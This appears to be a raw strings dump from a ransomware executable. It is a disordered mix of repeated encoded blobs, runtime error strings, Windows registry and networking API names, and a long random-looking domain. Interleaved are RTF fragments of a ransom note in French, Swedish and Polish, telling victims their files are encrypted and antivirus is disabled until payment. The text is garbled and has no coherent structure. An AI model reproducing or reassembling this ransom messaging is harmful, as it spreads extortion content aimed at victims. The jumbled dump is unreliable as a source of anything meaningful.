zpG/lm//BYUXKmGiBPE7SU3+02DVFvjdbN/56uHkPDr0JIkTiqEc/K5bNXpDJyHNLLfsnpukRFjYPa70OEejhUrAQx5VaRRTe46auY6EEeg7CAKUgURxT3xFV8ER9IrgJ8UJtzAossVSVkevFLW8Gw6x21dzGVir1jWd+HXH/RqxCFojB3fiJ60tdhIQEDYULF4y0ftfHjd62v3dOzBP3cRB5oCh5HGsaVM0dXo8ssm44lutrbnAKidNqTGOV7kMt8EvJ0 QsPSRS+0CVhiGUu0JPvA6MIy0a6U/E5efdOIadmMs3s2PjxAbyZ6cPh/Ep9RUTZ9z/0ptYl5+tHUwu5z7BEIoB/DKvkutUu2xW6fEClrZY+rdrFD5KQbp0qhYwgEls4ay1j31a+xkRP6TTMx8VvXUutIg1Gmd7i+sXAS6mY98lKee9NvMpJE7OavgZJbxo/kqwdZ5Tj1l7eearPZpscRjg4CUfNauUXzGWhrG2FiNPItH0FOQ7A9f3cPXnSmM0ThoXpQbOQk+0Qw0Ma8AvBS9wk1Xim39g+qnsR0jH1hj+GnpLnT2V696xoLq5JXvFCldRwwZ18KtgDzLK5pKFFVVYGAXHKozu1qDHgC1BDc/qWQDBkwICrYQF/E4CmHlXisGLvXbVSpE7k+htF6ziYfzx3K8oAi5djQQjxEGRioM8tQKTdy0vo9mkOkTyAtghOR6on0tj6O25Inereq0MqAnJ3jaZzHBDdLprgy6fNhShz3yJ7vjt9+LSzusMtag0UiP/Jv2Z8B+Kq1PkLw83Ud8aJ94cXcvXxzlYToxsC968/NAqrPzV7G08t9OVBU1Ay9CagtLbwGPLFUuhHwmAOAClSxlm+q1S1M+MOh+czc+zrW9Gt6dqAx0c5Jq2VtKjTZvEPaFywH2WMaXbRyDILYrV/l4GnsWyDasWepqTFZDZWTojz2/yys/dI44M27Zgev93L5zZT+37Ds9ChGlw426hFyShgeT5jh1hLu+ejGMM1SQAxxcYQ3Y3E9nzpG/lm//BYUXKmGiBPE7SU3+02DVFvjdbN/56uHkPDr0JIkTiqEc/K5bNXpDJyHNLLfsnpukRFjYPa70OEejhUrAQx5VaRRTe46auY6EEeg7CAKUgURxT3xFV8ER9IrgJ8UJtzAossVSVkevFLW8Gw6x21dzGVir1jWd+HXH/RqxCFojB3fiJ60tdhIQEDYULF4y0ftfHjd62v3dOzBP3cRB5oCh5HGsaVM0dXo8ssm44lutrbnAKidNqTGOV7kMt8EvJ0G qTTuSUGa17ic+uhwATSxV+9kDKttLpOxl8QnrQeGhIUudSlC7WYa2DU3KvqmmdXz0ous6eT40fQrzvUxRoY2sAlR/9MufDe0AOLP2UyRPOjBtzzsIbQkCGvH9KjmbSUSRu+3yNhHJhcnGqyI1nFFSiHLzRfbzT5nDJWj20K+YoaDJiVIKyPPHSIn0GPNf+XY6pqEhuZk0VT7KqXSebgEoj+J/+as3RbKVxm4UV0N/LhYmCGaga6iZxpcaaIkGv5CoMwVm9qg0c3gU69adsa3gvIHpdRwinDMkVgAbcUsj6x71EuENl/mBtq8XoQFJUdSRbvmbvP3kCVXmjqWBlx5dWEdHDol/hesqWQT5DtIqassVpw13gHYOyxljqUqOgXM9LlDf+khPKj+eiwd5XVjfcTFNHyJfYkQpH5vrF7UBFjS1HX2CI9kJNNVBVLf2sT5fexUEH4+yJ+acD0o/tlL8NWFGVMAb8sEL9jJT1RtR0c6XgIlZXQrjrT1/VRo3CwmsEH177rOqwtf3UEtlTvsMKGArsdjxV2WMC8pdE3gp/5F8p/9dZtTSYHv86T0s67e1D9h8bM9UeXBvvK0InkVHNc+QBCLSQQ8WZKPi65JrOAw6RYSbVuYmd4edzOz+MM3s9ihiP+v2Ia/qb8wnVsSaqc7dJr1/LHf58l55jopke6HbVf8+AXDS4cyYU3KufxpRBJ+RDNH2SfHgDe5nsLya0cTbE9TW17G0rjzidLF+1SKxtvyoygytWD+OFEzdREaKGI+ChFwrnNQxwLmoEqd4z08bluAYxkWTwPelzwPMnTHkDmpwbP+nJyrtAjELCaF3HOZcSnjo0ElSnQqk2yEEVmg4IOUAmcWv91SGReAcyACoZADCeT+mZjZhABDtNN7fMP7M8dgG3sTlQkLucLI3B7V2utiRsCOPfyrr6/xUNX7d+eToFoQcmrsfv/znK9q1B5EHCV9A7SaZZhT4p6lYRfnPg1kZ8TGZ5YNl51yfRJ61Rwgnc38RP4HkFhdvdC qTTuSUGa17ic+uhwATSxV+9kDKttLpOxl8QnrQeGhIUudSlC7WYa2DU3KvqmmdXz0ous6eT40fQrzvUxRoY2sAlR/9MufDe0AOLP2UyRPOjBtzzsIbQkCGvH9KjmbSUSRu+3yNhHJhcnGqyI1nFFSiHLzRfbzT5nDJWj20K+YoaDJiVIKyPPHSIn0GPNf+XY6pqEhuZk0VT7KqXSebgEoj+J/+as3RbKVxm4UV0N/LhYmCGaga6iZxpcaaIkGv5CoMwVm9qg0c3gU69adsa3gvIHpdRwinDMkVgAbcUsj6x71EuENl/mBtq8XoQFJUdSRbvmbvP3kCVXmjqWBlx5dWEdHDol/hesqWQT5DtIqassVpw13gHYOyxljqUqOgXM9LlDf+khPKj+eiwd5XVjfcTFNHyJfYkQpH5vrF7UBFjS1HX2CI9kJNNVBVLf2sT5fexUEH4+yJ+acD0o/tlL8NWFGVMAb8sEL9jJT1RtR0c6XgIlZXQrjrT1/VRo3CwmsEH177rOqwtf3UEtlTvsMKGArsdjxV2WMC8pdE3gp/5F8p/9dZtTSYHv86T0s67e1D9h8bM9UeXBvvK0InkVHNc+QBCLSQQ8WZKPi65JrOAw6RYSbVuYmd4edzOz+MM3s9ihiP+v2Ia/qb8wnVsSaqc7dJr1/LHf58l55jopke6HbVf8+AXDS4cyYU3KufxpRBJ+RDNH2SfHgDe5nsLya0cTbE9TW17G0rjzidLF+1SKxtvyoygytWD+OFEzdREaKGI+ChFwrnNQxwLmoEqd4z08bluAYxkWTwPelzwPMnTHkDmpwbP+nJyrtAjELCaF3HOZcSnjo0ElSnQqk2yEEVmg4IOUAmcWv91SGReAcyACoZADCeT+mZjZhABDtNN7fMP7M8dgG3sTlQkLucLI3B7V2utiRsCOPfyrr6/xUNX7d+eToFoQcmrsfv/znK9q1B5EHCV9A7SaZZhT4p6lYRfnPg1kZ8TGZ5YNl51yfRJ61Rwgnc38RP4HkFhdvdCo Qu'est-ce qui s'est pass\\'e9\\loch\\f31502 avec mon ordinateur? r mer information, klicka p\\'e5\\loch\\f31502 <}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid13779469 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 How to buy }{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid15532574\\charrsid13779469 r programvaran och inaktiverar ditt antivirusprogram ett tag tills du betalar och betalningen behandlas. O\\hich\\af31502\\dbch\\af31505\\loch\\f31502 \\hich\\f31502 R.@@- R6002- floating point support not loaded R6017- unexpected multithread lock error R6018- unexpected heap error R6032- not enough space for locale information R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. 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 RegCloseKey RegCreateKeyW RegisterAdapterName RegisterPrimaryName RegisterReverseLookup RegisterServiceCtrlHandlerA RegisterWanAdapters RegistrationEnabled RegistrationMaxAddressCount RegistrationOverwrite RegistrationRefreshInterval RegistrationTtl RegQueryValueExA RegSetValueExA RemoteRpcDll rer vos fichiers sans notre service de d\\'e9\\loch\\f31502 cryptage. ResolverRegistration ResolverRegistrationOnly Rp/ovZWeh65j6G5mVS3o3Ux5cH2pfT/VZm8xsBsr1o2YKlVmsY6mPAOnlmaEwFLrPTm5WIYnd0yOc3abTlt6R1RfwenXgqn5K1K6Uq5o7T+KblzWV1TXo0zTIBD/CwnKbkITPd7GkK+fG/pVTIAGxuI84OwkE6U9/WO3niv3bgLtebI/5Oj2ESIrNTwBRdIGzDYcK1VTlSYl0RMsMMZvWqZAhNBs9xfpyBgzAn+5NpIUwKnm6HS2UbNab6SQIQF53r0+Rx8w7xZkOEayDuGvPQ32Y7zfHtM8o8wsNxWPtI1zCcMUyHPA3zAeGkKIy51j911mdZeLmlXULTazhCdl+lYNd6aoUthPLUew6ng+vSLSxqF1N7+/bFkcWd5vuCPigEKxEg+X3d+JviOJaI9GJ2HWIT8ehFzv6JP7ymkH0XaHYKIXXDbGpMhJWmZzOd+KeEt4MY6Be95bnyjLPxR8Htcc2E35+8q074yiBdThfaOMI18K65supem5lEgTe2lQdQurhhNhgbmYPpmWsSerB8R4CiDHQg6B1xxN9lpUnCWCn37Ib9vdQ2V90almoOSh5FfBxJiPIERqxvWkHqv3h/c0c8MZ3kLJi/+5PD+F/rT0hmgD1lUoqZ9KfEAB/ivMQzIbMnhoJ6DpDZwXvWgYON+Ti4Of8cD3JVZFHKCPtFO1LWNuXu9DHS0cChPvbPTNgL1fuz3hWniAOjJxyXhilxEmUKoCuaHrjL7/mCwA8mUTF8nZfDOYFw/CN4ol8UuKSKKNotx6s4EGyOXAGxRTqQw5Rqr70SWFUVy18EO3TCMj/3eC7HjDV7CAh6+160YbDs53m7AehAx+OlUNq01wPuaxFfSqlgcUG+9Rn1b/Xp1jvWeSkCNdYiiiXi1XwsMrdhKZGKroSXSSJclExe6ZgcNNPa/HgjvXbwtmRkgiGneql4mBYmKDzcXCkp/tjnL6/KriY81gMHN4G9ulMunxVyF8wybDcifTOxtarjLXVRuC1Y7vzYaEuHT RtlLookupFunctionEntry runtime error Runtime Error!Program: s=""urn:schemas-microsoft-com:asm.v1"" manifestVersion=""1.0""> Windows 10 --> PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING WinSock 2.0 Provider ID WinSock_Registry_Version WpadSearchAllDomains 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 wszystkie pliki bezpiecznie i \\'b3\\loch\\f31528 atwo}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid11827162\\charrsid10775863 \\hich\\af31502\\dbch\\af31505\\loch\\f31502 . Ale nie masz tyle czasu. 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 www)iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com XA_A^A]A\\^_][ xA_A^A]A\\A[AZAYAX]_^ZY[XeH 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 XX^_]ZY[A\\A]A^A_H y, b}{\\rtlch\\fcs1 \\af2 \\ltrch\\fcs0 \\f31502\\fs22\\insrsid14315351\\charrsid3475210 